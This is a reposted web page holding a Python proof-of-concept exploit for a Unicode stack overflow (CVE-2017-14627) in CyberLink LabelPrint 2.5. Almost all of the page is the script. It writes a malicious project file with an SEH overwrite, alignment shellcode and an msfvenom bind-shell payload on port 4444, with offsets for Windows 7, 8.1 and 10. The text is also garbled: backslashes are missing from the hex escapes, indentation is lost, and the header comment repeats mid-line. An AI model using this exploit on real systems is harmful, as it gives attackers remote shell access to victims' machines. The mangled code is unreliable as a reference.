CyberLink LabelPrint Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 454

#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homep #!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.

def exp():
header = ("x3cx50x52x4fx4ax45x43x54x20x76x65x72x73x69x6fx6e"
"x3dx22x31x2ex30x2ex30x30x22x3ex0ax09x3cx49x4ex46"
"x4fx52x4dx41x54x49x4fx4ex20x74x69x74x6cx65x3dx22"
"x22x20x61x75x74x68x6fx72x3dx22x22x20x64x61x74x65"
"x3dx22x37x2fx32x34x2fx32x30x31x37x22x20x53x79x73"
"x74x65x6dx54x69x6dx65x3dx22x32x34x2fx30x37x2fx32"
"x30x31x37x22x3e")
filename2 = "labelprint_poc_universal.lpp"
f = open(filename2,'w')
junk = "A" * 790
nseh = "x61x42"
seh = "x2cx44"
nop = "x42"

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"

#preparing address for decoding
ven = nop #nop/inc edx
ven += "x54" #push esp
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += "x05x1Bx01" #add eax 01001B00 universal
ven += nop #nop/inc edx
ven += "x2dx01x01" #sub eax 01001000
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += nop #nop/inc edx
ven += "x5c" #pop esp

#we need to encode the RET address, since C3 is bad char.
#preparing ret opcode
ven += nop #nop/inc edx
ven += "x25x7ex7e" #and eax,7e007e00
ven += nop #nop/inc edx
ven += "x25x01x01" #and eax,01000100
ven += nop #nop/inc edx
ven += "x35x7fx7f" #xor eax,7f007f00
ven += nop #nop/inc edx
ven += "x05x44x44" #add eax,44004400
ven += nop #nop/inc edx
ven += "x57" #push edi
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += junk2 #depending OS

#custom venetian
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += align #depending OS
ven += nop #nop/inc edx
ven += "x2dx01x01" #add eax, 01000100 #align eax to our buffer
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += nop #nop/inc edx

#call esp 0x7c32537b MFC71U.dll
ven += "x5C" #pop esp
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += "x05x53x7c" #add eax 7c005300 part of call esp
ven += nop #nop/inc edx
ven += "x50" #push eax
ven += junk1 #depending OS
ven += "x7bx32" #part of call esp

#preparing for shellcode
ven += nop * 114 #junk
ven += "x57" #push edi
ven += nop #nop/inc edx
ven += "x58" #pop eax
ven += nop #nop/inc edx
ven += align2 #depending OS
ven += nop #nop/inc edx
ven += "x2dx01x01" #sub eax,01000100
ven += nop #nop/inc edx
ven += buf #shellcode

sisa = nop * (15000-len(junk+nseh+seh+ven))
payload = junk+nseh+seh+ven+sisa
bug="x09x09x3cx54x52x41x43x4bx20x6ex61x6dx65x3d"+'"'+payload+'"'+"/> "
bug+=("x09x3cx2fx49x4ex46x4fx52x4dx41x54x49x4fx4ex3ex0a"
"x3cx2fx50x52x4fx4ax45x43x54x3e")
f.write(header+ " " + bug)

print "[+] File", filename2, "successfully created!"
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
print "[*] Good luck ;)"
f.close()

print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <-------------------------------------------------> "
print " 1.Windows 7 x86 bindshell on port 4444"
print " 2.Windows 8.1 x64 bindshell on port 4444"
print " 3.Windows 10 x64 bindshell on port 4444 "
input = input("Choose Target OS : ")
try:
if input == 1:
align = "x05x09x01" #add eax,01000400
align2 = "x05x0Ax01" #add eax, 01000900
junk1 = 'x42' * 68 #junk for win7x86
junk2 = 'x42' * 893 #junk for win7x86
exp()
elif input == 2:
align = "x05x09x01" #add eax,01000400
align2 = "x05x0Ax01" #add eax, 01000900
junk1 = 'x42' * 116 #junk for win8.1x64
junk2 = 'x42' * 845 #junk for win8.1x64
exp()
elif input == 3:
align = "x05x05x01" #add eax,01000400
align2 = "x05x06x01" #add eax, 01000900
junk1 = 'x42' * 136 #junk for win10x64
junk2 = 'x42' * 313 #junk for win10x64
exp()
else:
print "Choose the right one :)"
except:
print ""